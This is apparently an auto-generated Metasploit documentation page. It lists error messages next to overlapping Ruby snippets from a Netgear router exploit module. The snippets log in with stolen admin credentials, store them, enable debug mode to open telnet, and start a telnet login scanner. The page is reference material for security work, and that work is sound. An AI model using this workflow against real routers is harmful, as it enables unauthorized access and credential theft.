199:	      fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
200:	    end
201:	
202:	    print_status('Got the authentication cookie, associating it with a logged in session...')
203:	    res = send_request_cgi(
204:	      'uri' => '/top.html',

Could not reach the target, something may have happened mid attempt!


Here is a relevant code snippet related to the "Could not reach the target, something may have happened mid attempt!" error message:

205:	      'method' => 'GET',
206:	      'authorization' => basic_auth(username, password)
207:	    )
208:	
209:	    if res.nil?
210:	      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
211:	    end
212:	
213:	    result = res.get_html_document
214:	    if result.xpath("//div[@id='firm_version']/text()").empty? # Find all div tags with an "id" attribute named "firm_version" and find its text value.
215:	      fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')

The target router did not respond with a firmware version when /top.html was requested. Are we logged in?


Here is a relevant code snippet related to the "The target router did not respond with a firmware version when /top.html was requested. Are we logged in?" error message:

210:	      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
211:	    end
212:	
213:	    result = res.get_html_document
214:	    if result.xpath("//div[@id='firm_version']/text()").empty? # Find all div tags with an "id" attribute named "firm_version" and find its text value.
215:	      fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
216:	    end
217:	
218:	    print_good('Successfully logged into target router using the stolen credentials!')
219:	    print_status('Attempting to store the stolen admin credentials for future use...')
220:	

Could not reach the target, something may have happened mid attempt!


Here is a relevant code snippet related to the "Could not reach the target, something may have happened mid attempt!" error message:

230:	      },
231:	      'authorization' => basic_auth(username, password)
232:	    )
233:	
234:	    if res.nil?
235:	      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
236:	    end
237:	
238:	    unless res.body.include?('Debug Enable!')
239:	      fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
240:	    end

Target did not enable debug mode for some reason!


Here is a relevant code snippet related to the "Target did not enable debug mode for some reason!" error message:

234:	    if res.nil?
235:	      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
236:	    end
237:	
238:	    unless res.body.include?('Debug Enable!')
239:	      fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
240:	    end
241:	    print_good('Telnet enabled on target router!')
242:	    handler = framework.modules.create('auxiliary/scanner/telnet/telnet_login')
243:	    handler.datastore['RHOSTS'] = datastore['RHOST']
244:	    File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Make sure the file is deleted if it already exists.


Authors


  • Unknown
  • Grant Willcox

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
